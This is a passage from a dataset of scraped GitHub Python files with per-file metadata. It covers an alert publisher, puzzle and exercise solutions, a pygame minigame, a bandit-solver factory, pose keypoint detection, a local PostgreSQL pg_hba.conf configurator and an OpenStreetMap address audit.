topic: The SNS topic ARN to send to.\n \"\"\"\n if self._sns_message_size_check(message):\n try:\n response = client.publish(\n TopicArn=topic,\n Message=message,\n Subject='StreamAlert Rules Triggered'\n )\n except botocore.exceptions.ClientError as e:\n logging.error('An error occured while publishing Alert: %s', e.response)\n raise e\n logger.info('Published %i alert(s) to %s', len(self.alerts), topic)\n logger.info('SNS MessageID: %s', response['MessageId'])\n else:\n logging.error('Cannot publish Alerts, message size is too big!')\n raise SNSMessageSizeError('SNS message size is too big! (Max: 256KB)')\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/airbnb_streamalert/streamalert-master/stream_alert/sink.py","file_name":"sink.py","file_ext":"py","file_size_in_byte":3585,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"21114466844","text":"#!/usr/bin/python3\n\nimport sys\n\nls = [l.strip() for l in sys.stdin]\n\ndirs = {\n 'R': 1,\n 'L': -1,\n 'U': 1j,\n 'D': -1j,\n}\n\nseent = set()\nh = t = 0\nseent.add(0)\n\nfor c in ls:\n d = c[0]\n steps = int(c[1:])\n\n for s in range(0, steps):\n h += dirs[d]\n if abs(h.real - t.real) > 1:\n t += dirs[d]\n if t.imag != h.imag:\n t = complex(t.real, h.imag)\n elif abs(h.imag - t.imag) > 1:\n t += dirs[d]\n if t.real != h.real:\n t = complex(h.real, t.imag)\n\n seent.add(t)\n\nprint(len(seent))\n\n\n\n","repo_name":"jjpp/aoc","sub_path":"2022/09/tail.py","file_name":"tail.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42772808075","text":"import json\n\ncusto = 0\n\nwith open('estoque.json', 'r') as arquivo_json:\n conteudo = arquivo_json.read()\n dic = json.loads(conteudo)['produtos']\n for prod in dic:\n quantidade = int(prod['quantidade'])\n valor = float(prod['valor'])\n custo += quantidade*valor\n\nprint(custo)\n ","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_148/ch159_2020_06_28_00_06_41_947213.py","file_name":"ch159_2020_06_28_00_06_41_947213.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33682786977","text":"import os\n\n\ndef validate_argvs(argvs):\n args = []\n for arg in argvs:\n _, ext = os.path.splitext(arg)\n if ext in ['.csv', '.xlsx', '.xls']:\n args.append(arg)\n \n if len(args) < 2:\n raise ValueError('Needed two of excel or csv file')\n return args[:2]\n","repo_name":"zwolf21/xldiff","sub_path":"xldiff/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12493882850","text":"import pygame, os\nimport time\nfrom mainConst import action, tamagotchiJump, pixel_font, screen\nfrom abs_path import abs_path\n\npygame.init()\n\nanimCount = 0\ntimeCount = 60\nscoreCount = 0\nseconds = 1\nclicked_play = False\n\n\nclass Play:\n def __init__(self):\n self.x = 325\n self.y = 400\n self.width = 150\n self.height = 150\n self.background_anim = [pygame.transform.scale(pygame.image.load(abs_path('images/backgrounds/background-0.png')), (800, 500)),\n pygame.transform.scale(pygame.image.load(abs_path('images/backgrounds/background-1.png')), (800, 500)),\n pygame.transform.scale(pygame.image.load(abs_path('images/backgrounds/background-2.png')), (800, 500)),\n pygame.transform.scale(pygame.image.load(abs_path('images/backgrounds/background-3.png')), (800, 500))]\n self.exit = pygame.transform.scale(pygame.image.load(abs_path('images/sprites/iconCross_beige.png')), (40, 40))\n self.exit_rect = self.exit.get_rect(center=(40, 40))\n\n def blit_play(self):\n global animCount\n if clicked_play:\n if animCount + 1 >= len(self.background_anim) * 7:\n animCount = 0\n screen.blit(self.background_anim[0], (0, 0))\n screen.blit(tamagotchiJump[0], (self.x, self.y))\n else:\n screen.blit(self.background_anim[animCount // 7], (0, 0))\n screen.blit(tamagotchiJump[animCount // 7], (self.x, self.y))\n animCount += 1\n\n time_left = pixel_font.render(f'Time Left: {timeCount}', True, (255, 255, 255))\n score = pixel_font.render(f'Score: {scoreCount}', True, (255, 255, 255))\n screen.blit(score, (600, 20))\n screen.blit(time_left, (600, 60))\n screen.blit(self.exit, self.exit_rect)\n\n def check_time(self, game_time):\n global clicked_play, timeCount, scoreCount, seconds\n t_time = time.time() - game_time\n if seconds < t_time:\n timeCount -= 1\n seconds += 1\n if timeCount == 0:\n action['logiki'] += scoreCount // 2\n if action['happy'] + 15 > 100:\n score = 100 - action['happy']\n action['happy'] += score\n else:\n action['happy'] += 15\n action['satiety'] -= 2\n clicked_play = False\n timeCount = 60\n seconds = 1\n scoreCount = 0\n pygame.mixer.music.unload()\n pygame.mixer.music.load(abs_path('sounds/backgroundMusic.ogg'))\n pygame.mixer.music.play(loops=-1)\n\n def control(self, keys):\n if keys[pygame.K_LEFT] and self.x > 1:\n self.x -= 7\n if keys[pygame.K_RIGHT] and self.x < 800 - self.width:\n self.x += 7\n\n\nclass Basket(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.basket = pygame.transform.scale(pygame.image.load(abs_path('images/sprites/basket.png')), (150 // 2, 150 // 3))\n self.rect = self.basket.get_rect(center=(400, 440))\n\n def blit_basket(self):\n screen.blit(self.basket, self.rect)\n\n def control(self, keys):\n if keys[pygame.K_LEFT] and self.rect.x > 35:\n self.rect.x -= 7\n if keys[pygame.K_RIGHT] and self.rect.x < 690:\n self.rect.x += 7\n\n\nclass Coin(pygame.sprite.Sprite):\n def __init__(self, x, speed, filename, group):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.transform.scale(pygame.image.load(filename), (30, 30))\n self.rect = self.image.get_rect(center=(x, 0))\n self.speed = speed\n self.add(group)\n\n def update(self, height):\n if self.rect.y < height - 20:\n self.rect.y += self.speed\n else:\n self.kill()\n","repo_name":"YarikHrabovets/tamagotchi","sub_path":"playClass.py","file_name":"playClass.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"21"} +{"seq_id":"10835707668","text":"from Classes_RL.Boltzmann_solver import Boltzmann, BoltzmannStationary, BoltzmannNonStationary, BoltzmannUCBStationary, BoltzmannUCBNonStationary, BoltzmannSlidingWindowUCB\nfrom Classes_RL.Bayesian_solver import Bayesian, BayesianStationaryUMUV, BayesianNonStationaryUMUV, BayesianStationaryUMKV, BayesianNonStationaryUMKV\nfrom Classes_RL.Bayesian_sliding_solver import BayesianSlidingWindowUMKV, BayesianSlidingWindowUMUV\nfrom Classes_RL.Kalman_filter_solver import Kalman, KalmanGreedy, KalmanEpsilonGreedy, KalmanUCB, KalmanSoftmax, KalmanUCBSoftmax, KalmanThompsonGreedy, KalmanThompsonSoftmax\nfrom Classes_RL.Interfaces import Solver\nfrom Classes_RL.Bandit import Bandit\nfrom typing import List\n\nclass Models:\n\n Boltzmann_stationary = \"boltzmann_stationary\" # Not coded\n Boltzmann_UCB_stationary = \"boltzmann_UCB_stationary\" # Not coded\n Boltzmann_non_stationary = \"boltzmann_non_stationary\" # Not coded\n Boltzmann_UCB_non_stationary = \"boltzmann_UCB_non_stationary\" # Not coded\n\n Boltzmann_UCB_sliding = \"boltzmann_UCB_sliding_non_stationary\"\n\n Kalman_greedy = \"kalman_greedy\" # Coded\n Kalman_e_greedy = \"kalman_e_greedy\" # Coded\n Kalman_UCB = \"kalman_UCB\" # Coded\n Kalman_softmax = \"kalman_softmax\" # Coded\n Kalman_UCB_softmax = \"kalman_UCB_softmax\" # Coded\n Kalman_Thompson_greedy = \"kalman_filter_Thompson_argmax\" # Coded\n Kalman_Thompson_softmax = \"kalman_filter_Thompson_softmax\" # Coded\n\n # Bayesian_um_kv_greedy_stationary = \"bayesian_um_kv_greedy_stationary\" # Not coded\n # Bayesian_um_uv_greedy_stationary = \"bayesian_um_uv_greedy_stationary\" # Not coded\n Bayesian_um_kv_softmax_stationary = \"bayesian_um_kv_softmax_stationary\" # Coded\n Bayesian_um_uv_softmax_stationary = \"bayesian_um_uv_softmax_stationary\" # Coded\n\n # Bayesian_um_kv_greedy_non_stationary = \"bayesian_um_kv_greedy_non_stationary\" # Not coded\n # Bayesian_um_uv_greedy_non_stationary = \"bayesian_um_uv_greedy_non_stationary\" # Not coded\n Bayesian_um_kv_softmax_non_stationary = \"bayesian_um_kv_softmax_non_stationary\" # Coded\n Bayesian_um_uv_softmax_non_stationary = \"bayesian_um_uv_softmax_non_stationary\" # Coded\n\n # Bayesian_um_kv_greedy_sliding_non_stationary = \"bayesian_um_kv_greedy_sliding_non_stationary\" # Not coded\n # Bayesian_um_uv_greedy_sliding_non_stationary = \"bayesian_um_uv_greedy_sliding_non_stationary\" # Not coded\n Bayesian_um_kv_softmax_sliding_non_stationary = \"bayesian_um_kv_softmax_sliding_non_stationary\" # Coded\n Bayesian_um_uv_softmax_sliding_non_stationary = \"bayesian_um_uv_softmax_sliding_non_stationary\" # Coded\n\n# print(Models.Boltzmann_stationary, Models.Boltzmann_UCB_stationary, Models.Boltzmann_non_stationary, Models.Boltzmann_UCB_non_stationary,\n# Models.Kalman_greedy, Models.Kalman_e_greedy, Models.Kalman_UCB, Models.Kalman_softmax, Models.Kalman_UCB_softmax, Models.Kalman_Thompson_greedy, Models.Kalman_Thompson_softmax,\n# Models.Bayesian_um_kv_greedy_stationary, Models.Bayesian_um_uv_greedy_stationary, Models.Bayesian_um_kv_softmax_stationary, Models.Bayesian_um_uv_softmax_stationary,\n# Models.Bayesian_um_kv_greedy_non_stationary, Models.Bayesian_um_uv_greedy_non_stationary, Models.Bayesian_um_kv_softmax_non_stationary, Models.Bayesian_um_uv_softmax_non_stationary,\n# Models.Bayesian_um_kv_greedy_sliding_non_stationary, Models.Bayesian_um_uv_greedy_sliding_non_stationary, Models.Bayesian_um_kv_softmax_sliding_non_stationary, Models.Bayesian_um_uv_softmax_sliding_non_stationary)\n\nclass SolverFactory():\n\n def create(self, bandits: List[Bandit], oracle_data: dict, n_episode: int, hyper_model: dict) -> Solver:\n\n # print(\"SolverFactory: \" + str(hyper_model))\n solver_name = hyper_model[\"solver_name\"]\n # print(solver_name)\n\n # print(solver_name == Models.Boltzmann_non_stationary)\n\n arguments = {\"bandits\": bandits,\n \"oracle_data\": oracle_data,\n \"n_iteration\": bandits[0].get_n_iteration(),\n \"n_episode\": n_episode}\n\n # ------- Boltzmann -------\n\n if solver_name == Models.Boltzmann_stationary:\n\n solver = BoltzmannStationary(**arguments)\n\n elif solver_name == Models.Boltzmann_UCB_stationary:\n\n solver = BoltzmannUCBStationary(**arguments)\n\n elif solver_name == Models.Boltzmann_non_stationary:\n\n solver = BoltzmannNonStationary(**arguments)\n\n elif solver_name == Models.Boltzmann_UCB_non_stationary:\n\n solver = BoltzmannUCBNonStationary(**arguments)\n\n # -------- Boltzmann - Sliding window -------\n\n elif solver_name == Models.Boltzmann_UCB_sliding:\n\n solver = BoltzmannSlidingWindowUCB(**arguments)\n\n # --------- Kalman -------\n\n elif solver_name == Models.Kalman_greedy:\n\n solver = KalmanGreedy(**arguments)\n\n elif solver_name == Models.Kalman_e_greedy:\n\n solver = KalmanEpsilonGreedy(**arguments)\n\n elif solver_name == Models.Kalman_UCB:\n\n solver = KalmanUCB(**arguments)\n\n elif solver_name == Models.Kalman_softmax:\n\n solver = KalmanSoftmax(**arguments)\n\n elif solver_name == Models.Kalman_UCB_softmax:\n\n solver = KalmanUCBSoftmax(**arguments)\n\n elif solver_name == Models.Kalman_Thompson_greedy:\n\n solver = KalmanThompsonGreedy(**arguments)\n\n elif solver_name == Models.Kalman_Thompson_softmax:\n\n solver = KalmanThompsonSoftmax(**arguments)\n\n # ------- Bayesian (Thompson Sampling) --------\n\n elif solver_name == Models.Bayesian_um_kv_softmax_stationary:\n\n solver = BayesianStationaryUMKV(**arguments)\n\n elif solver_name == Models.Bayesian_um_uv_softmax_stationary:\n\n solver = BayesianStationaryUMUV(**arguments)\n\n elif solver_name == Models.Bayesian_um_kv_softmax_non_stationary:\n\n solver = BayesianNonStationaryUMKV(**arguments)\n\n elif solver_name == Models.Bayesian_um_uv_softmax_non_stationary:\n\n solver = BayesianNonStationaryUMUV(**arguments)\n\n # ------- Bayesian - Sliding window -------\n\n elif solver_name == Models.Bayesian_um_kv_softmax_sliding_non_stationary:\n\n solver = BayesianSlidingWindowUMKV(**arguments)\n\n elif solver_name == Models.Bayesian_um_uv_softmax_sliding_non_stationary:\n\n solver = BayesianSlidingWindowUMUV(**arguments)\n\n else:\n\n solver = None\n\n solver.set_hyperparameters(hyper_model)\n\n return solver","repo_name":"KentaKamikokuryo/Bandits_AAE_Handrecognition","sub_path":"Python/Classes_RL/SolverFactory.py","file_name":"SolverFactory.py","file_ext":"py","file_size_in_byte":6578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36446804931","text":"import argparse\nimport numpy as np\nfrom time import time\nfrom datetime import timedelta\nimport os\nimport matplotlib.pyplot as plt\nimport logging\nimport cv2\nimport h5py\nimport json\n\nlogging.basicConfig(format=\"%(asctime)s %(levelname)s: %(message)s\",\n\t\t\t\t\tlevel=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\nclass TwoDKeyPoints:\n\t\"\"\"\n\tClass for point clouds Iterative Closest Point (ICP) implementation with\n\topen3d.\n\t\"\"\"\n\tcoco_pose_pairs = [[1,0],[1,2],[1,5],[2,3],[3,4],[5,6],\n\t\t\t\t\t [6,7],[1,8],[8,9],[9,10],[1,11],[11,12],\n\t\t\t\t\t [12,13],[0,14],[0,15],[14,16],[15,17]]\n\tcoco_key_points = [\n\t\t\t\"nose\", \"left_eye\", \"right_eye\", \"left_ear\", \"right_ear\",\n\t\t\t\"left_shoulder\", \"right_shoulder\", \"left_elbow\", \"right_elbow\",\n\t\t\t\"left_wrist\", \"right_wrist\", \"left_hip\", \"right_hip\", \"left_knee\",\n\t\t\t\"right_knee\", \"left_ankle\", \"right_ankle\"]\n\tnpoints = 18\n\t\n\tdef __init__(self, config={\n\t\t\"proto\": \"openpose/models/pose/coco/pose_deploy_linevec.prototxt\",\n\t\t\"weight\": \"openpose/models/pose/coco/pose_iter_440000.caffemodel\"}):\n\t\t\"\"\"\n\t\tInitialization.\n\t\t\n\t\tParameters:\n\t\t\tfilenames, list of str, full path to the filnames of the input point\n\t\t\t\tclouds\n\t\tCoCo key points:\n\t\t\t\"nose\", \"left_eye\", \"right_eye\", \"left_ear\", \"right_ear\",\n\t\t\t\"left_shoulder\", \"right_shoulder\", \"left_elbow\", \"right_elbow\",\n\t\t\t\"left_wrist\", \"right_wrist\", \"left_hip\", \"right_hip\", \"left_knee\",\n\t\t\t\"right_knee\", \"left_ankle\", \"right_ankle\"\n\t\t\"\"\"\n\t\tself.config = config\n\n\tdef _load_network(self):\n\t\t\"\"\"\n\t\tload the network if it is needed for inference\n\t\t\"\"\"\n\t\tassert \"proto\" in self.config, \"proto file not found!\"\n\t\tassert \"weight\" in self.config, \"weight file not found!\"\n\t\tself.prob_threshold = self.config.get(\"prob_threshold\", 0.5)\n\t\t# Read the network into Memory\n\t\tself.network = cv2.dnn.readNetFromCaffe(self.config[\"proto\"], self.config[\"weight\"])\n\t\tlogger.info(\"Load proto file: %s\" % (self.config[\"proto\"]))\n\t\tlogger.info(\"Load weight file: %s\" % (self.config[\"weight\"]))\n\n\t@staticmethod\n\tdef _get_frame(image_path):\n\t\tassert os.path.exists(image_path), \"%s not found\" % image_path\n\t\treturn cv2.imread(image_path)\n\n\tdef inference(self, image, out_path=None):\n\t\t\"\"\"\n\t\tMake inference of the 2d key points model\n\t\tParameters:\n\t\t\timage: str of image path, or np.array as image\n\t\t\"\"\"\n\t\tif not hasattr(self, \"network\"):\n\t\t\tself._load_network()\n\n\t\tself.frame = self._get_frame(image) if isinstance(image, str) else image\n\t\theight, width = self.frame.shape[0], self.frame.shape[1]\n\t\tprint(\"height\", height, \"width\", width)\n\t\tinputblob = cv2.dnn.blobFromImage(\n\t\t\t\t\tself.frame, 1.0 / 255, (width, height), (0, 0, 0), swapRB=False, crop=False)\n\t\tself.network.setInput(inputblob)\n\t\toutput = self.network.forward()\n\t\tself.keypoints = self._get_keypoints(output, width, height)\n\t\tlogger.info(\"Detected keypoints: %s\" % str(self.keypoints))\n\t\tkpdict = {key: p for key, p in zip(self.coco_key_points, self.keypoints) if p is not None}\n\t\tif out_path is not None:\n\t\t\toutdir = os.path.dirname(out_path)\n\t\t\tos.makedirs(outdir, exist_ok=True)\n\t\t\twith open(out_path, \"w\") as f:\n\t\t\t\tjson.dump(kpdict, f, indent=4 )\n\t\t\tlogger.info(\"output file saved to: %s\" % out_path)\n\t\tlogger.info(\"detected keypoints: %s\" % str(kpdict))\n\t\treturn kpdict\n\n\tdef _get_keypoints(self, output, width, height):\n\t\tprint(\"kp output shape\", output.shape)\n\t\tout_h = output.shape[2]\n\t\tout_w = output.shape[3]\n\t\tprint(\"output height\", out_h, \"width\", out_w)\n\n\t\t# Empty list to store the detected keypoints\n\t\tpoints = []\n\t\tfor i in range(self.npoints):\n\t\t\t# confidence map of corresponding body's part.\n\t\t\tprobMap = output[0, i, :, :]\n\t\t\t# Find global maxima of the probMap.\n\t\t\tminVal, prob, minLoc, point = cv2.minMaxLoc(probMap)\n\n\t\t\t# Scale the point to fit on the original image\n\t\t\tx = (width * point[0]) / out_w\n\t\t\ty = (height * point[1]) / out_h\n\n\t\t\tprint (\"index\", i, \"prob\", prob)\n\t\t\tif prob > self.prob_threshold:\n\t\t\t\t# Add the point to the list if the probability is greater than the threshold\n\t\t\t\tpoints.append((int(x), int(y)))\n\t\t\telse:\n\t\t\t\tpoints.append(None)\n\t\treturn points\n\n\tdef draw(self, outname):\n\n\t\tframecopy = np.copy(self.frame)\n\t\tfor idx, p in enumerate(self.keypoints):\n\t\t\tif p is None: continue\n\t\t\tcv2.circle(framecopy, p, 15, (0, 255, 255),\n thickness=-1, lineType=cv2.FILLED)\n\t\t\tcv2.putText(framecopy, \"{}\".format(idx),\n p, cv2.FONT_HERSHEY_SIMPLEX, 1.4,\n\t\t\t\t\t\t\t(0, 0, 255), 3, lineType=cv2.LINE_AA)\n\n\t\tfor pair in self.coco_pose_pairs:\n\t\t\tpartA = pair[0]\n\t\t\tpartB = pair[1]\n\n\t\t\tif self.keypoints[partA] and self.keypoints[partB]:\n\t\t\t\tcv2.line(framecopy, self.keypoints[partA], self.keypoints[partB], (0, 255, 0), 3)\n\t\tcv2.imwrite(outname)\n\t\tlogger.info(\"Save rgbd image: %s\" % outname)\n\n\t@staticmethod\n\tdef load_h5(filename):\n\t\t\"\"\"\n\t\tLoad key points from 2d key points module in the pipeline\n\t\tThere are 17 key points:\n\t\t\t['nose', 'left_eye', 'right_eye', 'left_ear', 'right_ear',\n\t\t\t'left_shoulder', 'right_shoulder', 'left_elbow', 'right_elbow',\n\t\t\t'left_wrist', 'right_wrist', 'left_hip', 'right_hip', 'left_knee',\n\t\t\t'right_knee', 'left_ankle', 'right_ankle']\n\t\t\"\"\"\n\t\tassert os.path.exists(filename), \"%s not found\" % filename\n\t\tkpdict = {}\n\t\twith h5py.File(filename, \"r\") as h5:\n\t\t\t# key points names\n\t\t\tnames = [name.decode('ascii') for name in np.array(h5[\"info\"][\"twoD_keypoints\"])]\n\t\t\tfor name in h5[\"data\"]:\n\t\t\t\t# rename\n\t\t\t\tif name[0:5] != \"frame\": continue\n\t\t\t\tidx = int(name[5:])\n\t\t\t\t# np.array(h5[\"data\"][name]) has 17 x 3 array... with float\n\t\t\t\t# need to save 17 x 2 with int\n\t\t\t\tkps = []\n\t\t\t\tfor p in np.array(h5[\"data\"][name]):\n\t\t\t\t\tkp = None if np.any(np.isnan(p)) else kps.append([int(p[0]), int(p[1])])\n\t\t\t\t\tkps.append(kp)\n\t\t\t\tkpdict[\"FRAME%04d\" % idx] = {name: kps[i] for i, name in enumerate(names)}\n\t\t\t\tlogger.info(\"loaded kp for %s\" % name)\n\t\treturn kpdict\n\ndef main():\n\tt_start = time()\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\n\t\t\"--input\", \"-i\", default=None, type=str, required=True,\n\t\thelp=\"Your input point cloud file.\",\n\t)\n\tparser.add_argument(\n\t\t\"--outdir\", \"-o\", default=\"outputs/keypoints\", type=str, required=False,\n\t\thelp=\"Your output folder.\",\n\t)\n\n\targs = parser.parse_args()\n\tlogger.info(\"Reading input file: %s\" % args.input)\n\tsc = TwoDKeyPoints()\n\tbasename = os.path.splitext(os.path.basename(args.input))[0]\n\tprint(\"basename\", basename)\n\tsc.inference(args.input, os.path.join(args.outdir, basename+\"_keypoints.json\"))\n\t# sc.draw(os.path.join(args.outdir, basename+\"_out.png\"))\n\ttdif = time() - t_start\n\tlogger.info(\"Time used: %s\" % str(timedelta(seconds=tdif)))\n\n\nif __name__ == \"__main__\":\n\t\"\"\"\n\tExecute example:\n\t\tpython3 pointcloudstransformation.py \\\n\t\t\t-i outputs/point_clouds/FRAME0000.ply \\\n\t\t\t-o /path/to/output/output_transformed\n\t\"\"\"\n\tmain()\n","repo_name":"jieyu11/PointCloudsConversion","sub_path":"twodkeypoints.py","file_name":"twodkeypoints.py","file_ext":"py","file_size_in_byte":6729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40049320353","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys\nimport os\nimport re\n\n\ndef fmt_line(user, dbtype):\n if dbtype == \"local\":\n return \"local\\tall\\t\\t%s\\t\\t\\t\\t\\ttrust\" % user\n elif dbtype == \"ipv4\":\n return \"host\\tall\\t\\t%s\\t\\t127.0.0.1/32\\t\\ttrust\" % user\n elif dbtype == \"ipv6\":\n return \"host\\tall\\t\\t%s\\t\\t::1/128\\t\\t\\ttrust\" % user\n return \"###### INVALID LINE\"\n\n\ndef do_conf_pg(ffn):\n found_tag = False\n done = False\n target = []\n # import pdb; pdb.set_trace()\n with open(ffn, \"r\") as fd:\n lines = fd.read().split(\"\\n\")\n for nro, line in enumerate(lines):\n if re.match(r\"^[\\s]*local[\\s]*all[\\s]*postgres\", line):\n found_tag = True\n elif found_tag and re.match(r\"^[\\s]*local[\\s]*all[\\s]\", line):\n if not done:\n for role in (\"odoo\", \"oca\"):\n for version in (\n \"\",\n \"6\",\n \"7\",\n \"8\",\n \"9\",\n \"10\",\n \"11\",\n \"12\",\n \"13\",\n \"14\",\n \"15\",\n \"16\",\n \"_www\",\n ):\n if role == \"oca\" and version in (\"\", \"6\"):\n continue\n target.append(fmt_line(\"%s%s\" % (role, version), \"local\"))\n target.append(fmt_line(\"%s%s\" % (role, version), \"ipv4\"))\n target.append(fmt_line(\"%s%s\" % (role, version), \"ipv6\"))\n target.append(fmt_line(\"weblate\", \"local\"))\n target.append(fmt_line(\"weblate\", \"ipv4\"))\n target.append(fmt_line(\"weblate\", \"ipv6\"))\n target.append(fmt_line(\"kalamitica\", \"local\"))\n target.append(fmt_line(\"kalamitica\", \"ipv4\"))\n target.append(fmt_line(\"kalamitica\", \"ipv6\"))\n done = True\n continue\n target.append(line)\n\n if found_tag:\n bakfile = \"%s.bak\" % ffn\n if os.path.isfile(bakfile):\n os.remove(bakfile)\n if os.path.isfile(ffn):\n os.rename(ffn, bakfile)\n with open(ffn, \"w\") as fd:\n fd.write(\"\\n\".join(target))\n print(ffn)\n\n\ndef main(argv):\n argv = argv or sys.argv[1:]\n path = None\n for param in argv:\n if param.startswith(\"-\"):\n pass\n else:\n path = os.path.expanduser(param)\n if not path:\n print(\"No path supplied! Use %s PATH\" % sys.argv[0])\n return 1\n if os.path.isdir(path):\n print(\"Supplied path is not a file\")\n return 1\n elif os.path.isfile(path):\n do_conf_pg(path)\n else:\n print(\"Path %s does not exist!\" % sys.argv[0])\n return 2\n return 0\n\n\nif __name__ == \"__main__\":\n exit(main(None))\n","repo_name":"zeroincombenze/tools","sub_path":"wok_code/pgconf.py","file_name":"pgconf.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"35663390935","text":"import sys\nsys.stdin = open(\"sample_input_sum.txt\")\n\nT = int(input())\n\nfor tc in range(T):\n N, M = map(int, input().split())\n list_num = list(map(int, input().split()))\n max_sum = -float(\"inf\")\n min_sum = float(\"inf\")\n\n for i in range(0, N+1 - M):\n each = 0 # 부분합을 받는 변수.\n for j in range(M):\n each += list_num[i+j] # i는 현재 인덱스, j는 부분합을 구성하는 부분들의 수.\n if each > max_sum: # 특정 부분합이 가장 크다면 새로운 부분합의 최대값이 된다.\n max_sum = each\n if each < min_sum: # 특정 부분합이 가장 작다면 새로운 부분합의 최소값이 된다.\n min_sum = each\n print(f\"#{tc+1} {max_sum - min_sum}\")","repo_name":"gogumasitda/TIL","sub_path":"algorithm/01.15/sum.py","file_name":"sum.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"ko","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"75060812211","text":"\n# coding: utf-8\n\n# In[1]:\n\nimport xml.etree.cElementTree as ET\nimport pprint\n\nfrom collections import defaultdict\nimport re\nfilename = 'FTWORTH.xml'\n\n\n# In[2]:\n\n\ndef count_tags(filename):\n tag_count = {}\n for event, element in ET.iterparse(filename, events=(\"start\",)):\n add_tag(element.tag, tag_count)\n return tag_count\n\ndef add_tag(tag, tag_count):\n if tag in tag_count:\n tag_count[tag] += 1\n else:\n tag_count[tag] = 1\n\n\ndef test():\n\n tags = count_tags(filename)\n pprint.pprint(tags)\n assert tags == {\n 'bounds': 1,\n 'member': 9228,\n 'meta': 1,\n 'nd': 346342,\n 'node': 307175,\n 'note': 1,\n 'osm': 1,\n 'relation': 109,\n 'tag': 133992,\n 'way': 35600}\n\n\n \nif __name__ == \"__main__\":\n test()\n\n\n# In[3]:\n\nlower = re.compile(r'^([a-z]|_)*$')\nlower_colon = re.compile(r'^([a-z]|_)*:([a-z]|_)*$')\nproblemchars = re.compile(r'[=\\+/&<>;\\'\"\\?%#$@\\,\\. \\t\\r\\n]')\n\ndef key_type(element, keys):\n if element.tag == \"tag\":\n key = element.attrib[\"k\"]\n if lower.search(key):\n keys['lower'] += 1\n ### \n elif lower_colon.search(key):\n keys['lower_colon'] += 1\n ###\n elif problemchars.search(key):\n keys[\"problemchars\"] += 1\n ###\n else:\n keys['other'] += 1\n ###\n return keys\n\n\n\n\ndef process_map(filename):\n keys = {\"lower\": 0, \"lower_colon\": 0, \"problemchars\": 0, \"other\": 0}\n for _, element in ET.iterparse(filename):\n keys = key_type(element, keys)\n\n return keys\n\n\n\ndef test():\n # You can use another testfile 'map.osm' to look at your solution\n # Note that the assertion below will be incorrect then.\n # Note as well that the test function here is only used in the Test Run;\n # when you submit, your code will be checked against a different dataset.\n keys = process_map(filename)\n pprint.pprint(keys)\n assert keys == {'lower': 48048, 'lower_colon': 85236, 'other': 708, 'problemchars': 0}\n\n\nif __name__ == \"__main__\":\n test()\n\n\n# In[22]:\n\n#Street Types Auditing \n\n\nstreet_type_re = re.compile(r'\\S+\\.?$', re.IGNORECASE)\nstreet_types = defaultdict(int)\n\ndef audit_street_type(street_types, street_name):\n m = street_type_re.search(street_name)\n if m:\n street_type = m.group()\n street_types[street_type] += 1\n\ndef print_sorted_dict(d):\n keys = d.keys()\n keys = sorted(keys, key=lambda s: s.lower())\n for k in keys:\n v = d[k]\n print(\"%s: %d\" % (k, v))\n #Finding the street abbreviations \ndef is_street_name(elem):\n return (elem.tag == \"tag\") and (elem.attrib['k'] == \"addr:street\")\n\n \ndef audit():\n for event, elem in ET.iterparse(filename):\n if is_street_name(elem):\n audit_street_type(street_types, elem.attrib['v']) \n print_sorted_dict(street_types) \n\n\nif __name__ == '__main__':\n audit()\n\n\n# In[23]:\n\nOSMFILE = \"FTWORTH.xml\"\nstreet_type_re = re.compile(r'\\b\\S+\\.?$', re.IGNORECASE)\n\n#Words included that did not need corrections\nexpected = [\"Street\", \"Avenue\", \"Boulevard\", \"Drive\", \"Court\", \"Place\", \"Square\", \"Lane\", \"Road\", \n \"Trail\", \"Parkway\", \"Commons\", \"Terrace\", \"West\",\"Way\",\"South\", \"Run\",\"Plaza\", \"North\",\n \"Levee\",\"Highway\", \"Gipson\", \"Freeway\", \"East\", \"Drive\", \"Circle\",\"A\",\"B\",\"C\",\"D\",\"E\",\"G\",\n \"H\",\"I\", \"J\", \"K\", \"L\", \"M\", \"N\", \"O\", \"P\", \"201\"]\n\n# Abbreviations that need to be fixed \nmapping = { \"St\": \"Street\",\n \"Ave\" : \"Avenue\",\n \"Blvd\": \"Boulevard\",\n \"Dr\" : \"Drive\"\n }\n\ndef audit_street_type(street_types, street_name):\n m = street_type_re.search(street_name)\n if m:\n street_type = m.group()\n if street_type not in expected:\n street_types[street_type].add(street_name)\n\n\ndef is_street_name(elem):\n return (elem.attrib['k'] == \"addr:street\")\n\n\ndef audit(osmfile):\n osm_file = open(osmfile, \"r\", encoding='utf-8')\n street_types = defaultdict(set)\n for event, elem in ET.iterparse(osm_file, events=(\"start\",)):\n\n if elem.tag == \"node\" or elem.tag == \"way\":\n for tag in elem.iter(\"tag\"):\n if is_street_name(tag):\n audit_street_type(street_types, tag.attrib['v'])\n osm_file.close()\n return street_types\n\n# updating the abbreviations \ndef update_name(name, mapping):\n m = street_type_re.search(name)\n if m:\n street_type = m.group()\n better_type = street_type\n for problem_type in mapping:\n if street_type == problem_type:\n better_type = mapping[problem_type]\n \n better_name = name.replace(street_type, better_type)\n 